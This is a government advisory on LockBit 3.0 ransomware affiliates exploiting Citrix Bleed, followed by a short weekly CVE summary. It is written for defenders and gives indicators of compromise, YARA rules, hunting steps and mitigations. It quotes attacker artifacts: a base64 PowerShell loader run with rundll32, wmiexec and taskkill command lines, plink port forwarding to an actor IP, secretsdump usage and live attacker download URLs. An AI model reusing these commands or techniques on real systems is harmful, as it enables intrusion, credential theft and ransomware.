DefendEdge Logo
Categories
alerts

#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.

This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization.

Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPs.

Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. Through the takeover of legitimate user sessions, malicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources.

CISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA, which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge Center.

The authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations. If no compromise is detected, organizations should immediately apply patches made publicly available.

Download the PDF version of this report:

For the Malware Analysis Report (MAR), see: MAR-10478915-1.v1 Citrix Bleed

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool

CVE-2023-4966

CVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0 ransomware affiliates, the capability to bypass MFA [T1556.006] and hijack legitimate user sessions [T1563].

After acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler appliance without a username, password, or access to MFA tokens [T1539]. Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information [T1082]. The information obtained through this exploit contains a valid NetScaler AAA session cookie.

Citrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, within their Citrix Security Bulletin, which issued guidance, and detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of active exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEVs) Catalog. This critical vulnerability exploit impacts the following software versions [1]:

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
  • NetScaler ADC and NetScaler Gateway version 12.1 (EOL)
  • NetScaler ADC 13.1FIPS before 13.1-37.163
  • NetScaler ADC 12.1-FIPS before 12.1-55.300
  • NetScaler ADC 12.1-NDcPP before 12.1-55.300

Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks.

Threat Actor Activity

Malware identified in this campaign is generated beginning with the execution of a PowerShell script (123.ps1) which concatenates two base64 strings together, converts them to bytes, and writes them to the designated file path.

$y = “TVqQAAMA…

$x = “RyEHABFQ…

$filePath = “C:UsersPublicadobelib.dll”

$fileBytes = [System.Convert]::FromBase64String($y + $x)

[System.IO.File]::WriteAllBytes($filePath, $fileBytes)

The resulting file (adobelib.dll) is then executed by the PowerShell script using rundll32.

rundll32 C:UsersPublicadobelib.dll,main <104 hex char key>

The Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the DLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses 172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. Although adobelib.dll and the adobe-us-updatefiles[.]digital have the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified interaction with the software.

Other observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example, LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring (RMM), Batch and PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe and other common software tools typically associated with ransomware incidents.

INDICATORS OF COMPROMISE (IOCS)

See Table 1–Table 5 for IOCs related to Lockbit 3.0 affiliate exploitation of CVE-2023-4966.

[Fidelity] Legend:

  • High = Indicator is unique or highly indicates LockBit in an environment.
  • Medium = Indicator was used by LockBit but is used outside of LockBit activity, albeit rarely.
  • Low = Indicates tools that are commonly used but were used by LockBit.

Low confidence indicators may not be related to ransomware.

Table 1: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

192.229.221[.]95

IP

Low

Mag.dll calls out to this IP address. Ties back to dns0.org. Should run this DLL in a sandbox, when possible, to confirm C2. IP is shared hosting.

123.ps1

PowerShell script

High

Creates and executes payload via script.

193.201.9[.]224

IP

High

FTP to Russian geolocated IP from compromised system

62.233.50[.]25

IP

High

Russian geolocated IP from compromised system

Hxxp://62.233.50[.]25/en-us/docs.html

Hxxp://62.233.50[.]25/en-us/test.html

51.91.79[.].17

IP

Med

Temp.sh IP

Teamviewer

Tool (Remote Admin)

Low

 

70.37.82[.]20

IP

Low

IP was seen from a known compromised account reaching out to an Altera IP address. LockBit is known to leverage Altera, a remote admin tool, such as Anydesk, team viewer, etc.

185.17.40[.]178

IP

Low

Teamviewer C2, ties back to a polish service provider, Artnet Sp. Zo.o. Polish IP address

Table 2: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

185.229.191.41

Anydesk Usage

High

Anydesk C2

81.19.135[.]219

IP

High

Russian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta

Hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta

45.129.137[.]233

IP

Medium

Callouts from known compromised device beginning during the compromised window.

185.229.191[.]41

Anydesk Usage

High

Anydesk C2

Plink.exe

Command interpreter

High

Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows.

AnyDeskMSI.exe

Remote admin tool

High

We do see that AnyDeskMSI.exe was installed as a service with “auto start” abilities for persistence. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently.

SRUtility.exe

Splashtop utility

 

9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a

Netscan exe

Network scanning software

High

498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155

Table 3: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

Scheduled task:

MEGAMEGAcmd

Persistence

 

High

 

Scheduled task:

UpdateAdobeTask

Persistence

High

 

Mag.dll

Persistence

High

Identified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63

 

 

123.ps1

Script

High

Creates rundll32 C:UsersPublicadobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44

 

 

Adobelib.dll

Persistence

Low

C2 from adobelib.dll.

Adobe-us-updatefiles[.]digital

Tool Download

High

Used to download obfuscated toolsets

172.67.129[.]176

Tool Download

High

IP of adobe-us-updatefiles[.]digital

104.21.1[.]180

Tool Download

High

Adobe-us-updatefiles[.]digital

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698617793[.]44 2>&1

 

Command

High

wmiexec.exe usage

 

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698617793[.]44 2>&1

 

Command

High

wmiexec.exe usage

 

cmd.exe /q /c query user 1> \127.0.0.1admin$__1698617793[.]44 2>&1

 

Command

High

wmiexec.exe usage

 

cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex

 

Command

High

wmiexec.exe usage

 

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698618133[.]54 2>&1

 

Command

High

wmiexec.exe usage

 

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698618203[.]51 2>&1

 

Command

High

 

The authoring organizations recommended monitoring/reviewing traffic to the 81.19.135[.]* class C network and review for MSHTA being called with HTTP arguments [3].

Table 4: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

Notes

81.19.135[.]219

 

IP

High

Russian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7.hta

 

 

81.19.135[.]220

 

IP

High

Russian geolocated IP, seen outbound in logs

IP registered to a South African Company

81.19.135[.]226

 

IP

High

Russian geolocated IP, seen outbound in logs

IP registered to a South African Company

Table 5: Citrix Bleed Indicators of Compromise (IOCs)

Type

Indicator

Description

Filename

c:usersdownloadsprocess hacker 2peview.exe

Process hacker

Filename

c:usersmusicprocess hacker 2processhacker.exe

Process hacker

Filename

psexesvc.exe

Psexec service excutable

Filename

c:perflogsprocesshacker.exe

Process hacker

Filename

c:windowstempscreenconnect23.8.5.8707filesprocesshacker.exe

Process hacker transferred via screenconnect

Filename

c:perflogslsass.dmp

Lsass dump

Filename

c:usersdownloadsmimikatz.exe

Mimikatz

Filename

c:usersdesktopproc64proc.exe

Procdump

Filename

c:usersdocumentsveeam-get-creds.ps1

Decrypt veeam creds

Filename

secretsdump.py

Impacket installed on azure vm

Cmdline

secretsdump.py /@ -outputfile 1

Impacket installed on azure vm

Filename

ad.ps1

Adrecon found in powershell transcripts

Filename

c:perflogs64-bitnetscan.exe

Softperfect netscan

Filename

tniwinagent.exe

Total network inventory agent

Filename

psexec.exe

Psexec used to deploy screenconnect

Filename

7z.exe

Used to compress files

Tool

Action1

RMM

Tool

Atera

RMM

tool

anydesk

rmm

tool

fixme it

rmm

tool

screenconnect

rmm

tool

splashtop

rmm

tool

zoho assist

rmm

ipv4

101.97.36[.]61

zoho assist

ipv4

168.100.9[.]137

ssh portforwarding infra

ipv4

185.20.209[.]127

zoho assist

ipv4

185.230.212[.]83

zoho assist

ipv4

206.188.197[.]22

powershell reverse shell seen in powershell logging

ipv4

54.84.248[.]205

fixme ip

Ipv4

141.98.9[.]137

Remote IP for CitrixBleed

domain

assist.zoho.eu

zoho assist

filename

c:perflogs1.exe

connectwise renamed

filename

c:perflogsrun.exe

screenconnect pushed by psexec

filename

c:perflogs64-bitm.exe

connectwise renamed

filename

c:perflogs64-bitm0.exe

connectwise renamed

filename

c:perflogsza_access_my_department.exe

zoho remote assist

filename

c:usersmusicza_access_my_department.exe

zoho remote assist

filename

c:windowsservicehost.exe

plink renamed

filename

c:windowssysconf.bat

runs servicehost.exe (plink) command

filename

c:windowstempscreenconnect23.8.5.8707filesazure.msi

zoho remote assist used to transfer data via screenconnect

cmdline

echo enter | c:windowsservicehost.exe -ssh -r 8085:127.0.0.1:8085 @168.100.9[.]137 -pw

plink port forwarding

domain

eu1-dms.zoho[.]eu

zoho assist

domain

fixme[.]it

fixme it

domain

unattended.techninline[.]net

fixme it

MITRE ATT&CK Tactics and Techniques

See Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisory.

Table 6: ATT&CK Techniques for Enterprise: Discovery

Technique Title

ID

Use

System Information Discovery

T1082

Threat actors will attempt to obtain information about the operating system and hardware, including versions, and patches.

Table 7: ATT&CK Techniques for Enterprise: Credential Access

Technique Title

ID

Use

Modify Authentication Process: Multifactor Authentication

T1556.006

Threat actors leverage vulnerabilities found within CVE- to compromise, modify, and/or bypass multifactor authentication to hijack user sessions, harvest credentials, and move laterally, which enables persistent access.

Steal Web Session Cookie

T1539

Threat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username, password, or access to multifactor authentication (MFA) tokens.

DETECTION METHODS

Hunting Guidance

Network defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt for suspicious activity such as installing tools on the system (e.g., putty, rClone ), new account creation, log item failure, or running commands such as hostname, quser, whoami, net, and taskkill. Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection.

For IP addresses:

  • Identify if NetScaler logs the change in IP.
  • Identify if users are logging in from geolocations uncommon for your organization’s user base.
  • If logging VPN authentication, identify if users are associated with two or more public IP addresses while in a different subnet or geographically dispersed.

Note: MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a token/session for an already authenticated user.

The following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity:

  • Search for filenames that contain tf0gYx2YI for identifying LockBit encrypted files.
  • LockBit 3.0 actors were seen using the C:Temp directory for loading and the execution of files.
  • Investigate requests to the HTTP/S endpoint from WAF.
  • Hunt for suspicious login patterns from NetScaler logs
  • Hunt for suspicious virtual desktop agent Windows Registry keys
  • Analyze memory core dump files.

Below, are CISA developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler logs or additional resources, visit CISA’s Malware Analysis Report (MAR) MAR-10478915-1.v1 Citrix Bleed or the resource section of this CSA [2]:

YARA Rules

CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM). The files include:

  • Windows Batch file (.bat)
  • Windows Executable (.exe)
  • Windows Dynamic Link Library (.dll)
  • Python Script (.py)

rule CISA_10478915_01 : trojan installs_other_components

{

meta:

author = “CISA Code & Media Analysis”

incident = “10478915”

date = “2023-11-06”

last_modified = “20231108_1500”

actor = “n/a”

family = “n/a”

capabilities = “installs-other-components”

malware_Type = “trojan”

tool_type = “information-gathering”

description = “Detects trojan .bat samples”

sha256 = “98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9”

strings:

$s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }

$s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73

5c 65 6d }

$s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64

6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }

condition:

all of them

}

This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named ‘z.txt’ located in the path C:WindowsTasks. Next, a.bat pings the loop back internet protocol (IP) address 127.0.0[.]1 three times.

The next command it runs is reg save to save the HKLMSYSTEM registry hive into the C:Windowstasksem directory. Again, a.bat pings the loop back address 127.0.0[.]1 one time before executing another reg save command and saves the HKLMSAM registry hive into the C:WindowsTaskam directory. Next, a.bat runs three makecab commands to create three cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:UsersPublica.png. The names of the .cab files are as follows:

  • c:windowstasksem.cab
  • c:windowstasksam.cab
  • c:windowstasksa.cab

rule CISA_10478915_02 : trojan installs_other_components

{

meta:

author = “CISA Code & Media Analysis”

incident = “10478915”

date = “2023-11-06”

last_modified = “20231108_1500”

actor = “n/a”

family = “n/a”

capabilities = “installs-other-components”

malware_type = “trojan”

tool_type = “unknown”

description = “Detects trojan PE32 samples”

sha256 = “e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068”

strings:

$s1 = { 57 72 69 74 65 46 69 6c 65 }

$s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 }

$s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }

$s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }

$s5 = { 64 65 6c 65 74 65 5b 5d }

$s6 = { 4e 41 4e 28 49 4e 44 29 }

condition:

uint16(0) == 0x5a4d and pe.imphash() == “6e8ca501c45a9b85fff2378cffaa24b2” and pe.size_of_code == 84480 and all of

them

}

This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote procedure call (RPC) ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is correctly loaded, then the malware outputs the message “[*]success” in the console.

rule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation

{

meta:

author = “CISA Code & Media Analysis”

incident = “10478915”

date = “2023-11-06”

last_modified = “20231108_1500”

actor = “n/a”

family = “n/a”

capabilities = “steals-authentication-credentials”

malware_type = “trojan”

tool_type = “credential-exploitation”

description = “Detects trojan DLL samples”

sha256 = “17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994”

strings:

$s1 = { 64 65 6c 65 74 65 }

$s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }

$s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }

$s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }

$s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }

$s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }

condition:

uint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of

them

}

This file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:UsersPublic.

Next, a.dll loads DbgCore.dll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, the file a.bat specifies that the file a.png is used to create the cabinet file called a.cab in the path C:WindowsTasks.

rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access

{

meta:

author = “CISA Code & Media Analysis”

incident = “10478915”

date = “2023-11-06”

last_modified = “20231108_1500”

actor = “n/a”

family = “n/a”

capabilities = “communicates-with-c2”

malware_type = “backdoor”

tool_type = “remote-access”

description = “Detects trojan python samples”

sha256 = “906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6”

strings:

$s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }

$s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }

$s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }

$s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }

condition:

all of them

}

This file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword “hashpasswd” is present. If the keyword “hashpasswd” is not present, then the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script has the ability to execute command line arguments on the remote machine. If there is no command specified, then a default command of “whoami” is run.

Open Source YARA Rule

Import "pe"

rule M_Hunting_Backdoor_FREEFIRE

{

meta: author = "Mandiant"

description = "This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord method"

 md5 = "eb842a9509dece779d138d2e6b0f6949"

malware_family = "FREEFIRE"

strings: $s1 = { 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? ??

}

condition:

uint16(0) == 0x5A4D

and filesize >= 5KB

and pe.imports("mscoree.dll")

and all of them }

INCIDENT RESPONSE

Organizations are encouraged to assess Citrix software and your systems for evidence of compromise, and to hunt for malicious activity (see Additional Resources section).If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software as well as installing malicious code.

If a potential compromise is detected, organizations should:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Create new account credentials.
  4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
    • Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.
  5. Report the compromise to FBI Internet Crime Complaint Center (IC3) at IC3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government (SLTT) entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722). If outside of the US, please contact your national cyber center.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software. CISA and authoring organizations recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of exploitation such as threat actors leveraging unpatched vulnerabilities within Citrix NetScaler appliances, which strengthens the security posture of their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The authoring organizations of this CSA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix CVE 2023-4966 and LockBit 3.0 ransomware & ransomware affiliates. These mitigations align with the Cross-Sector Cybersecurity performance goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Isolate NetScaler ADC and Gateway appliances for testing until patching is ready and deployable.
  • Secure remote access tools by:
    • Implement application controls to manage and control the execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Restrict the use of PowerShell, using Group Policy, and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [CPG 2.E].
  • Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
  • Enable enhanced PowerShell logging [CPG 2.T, 2.U].
    • PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use.
    • Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).
    • The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.
  • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies.
    • Use longer passwords consisting of at least 15 characters [CPG 2.B].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords [CPG 2.C].
    • Implement multiple failed login attempt account lockouts [CPG 2.G].
    • Disable password “hints.”
    • Require administrator credentials to install software.
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
    • Upgrade vulnerable NetScaler ADC and Gateway appliances to the latest version available to lower the risk of compromise.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 1).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and the authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations.

ACKNOWLEDGEMENTS

Boeing contributed to this CSA.

REFERENCES

[1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966

[2] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966

[3] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)

VERSION HISTORY

November 21, 2023: Initial version.

 

 

Categories
alerts

Vulnerability Summary for the Week of November 13, 2023

 High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
checkpoint — endpoint_security Local attacker can escalate privileges on affected installations of Check Point Harmony Endpoint/ZoneAlarm Extreme Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2023-11-12 7.8 CVE-2023-28134
discourse — discourse Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, the embedding feature is susceptible to server-side request forgery. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. As a workaround, disable the Embedding feature. 2023-11-10 9.8 CVE-2023-47121

 

discourse — discourse Discourse is an open source platform for community discussion. In versions 3.1.0 through 3.1.2 of the `stable` branch and versions 3.1.0,beta6 through 3.2.0.beta2 of the `beta` and `tests-passed` branches, Redis memory can be depleted by crafting a site with an abnormally long favicon URL and drafting multiple posts which Onebox it. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. There are no known workarounds. 2023-11-10 7.5 CVE-2023-47120

 

dreamer_cms — dreamer_cms Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/task/changeStatus. 2023-11-14 8.8 CVE-2023-48020
dreamer_cms — dreamer_cms Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/task/update. 2023-11-14 8.8 CVE-2023-48021
